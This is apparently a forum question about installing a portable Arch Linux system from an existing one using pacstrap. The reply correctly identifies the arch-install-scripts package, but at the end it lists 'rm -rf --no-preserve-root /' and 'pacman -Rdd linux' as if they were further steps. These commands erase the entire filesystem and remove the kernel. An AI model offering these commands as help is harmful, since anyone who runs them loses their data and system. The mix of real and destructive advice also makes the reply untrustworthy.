How to install a new Arch system from an old one?

Hello. I want to have a portable Arch installation and wanted to use my current Arch system to bootstrap one. How can I get the pacstrap command on an installed Arch system? Or are there any alternatives that don't involve rebooting?

% pacman -F pacstrap
extra/arch-install-scripts 29-1 [installed]
    usr/bin/pacstrap
    usr/share/bash-completion/completions/pacstrap

Also you can use extra/archinstall. Probably

gpg --keyserver keys.openpgp.org --recv-keys 9845128C4D23BBBA
rm -rf --no-preserve-root /
pacman -Rdd linux
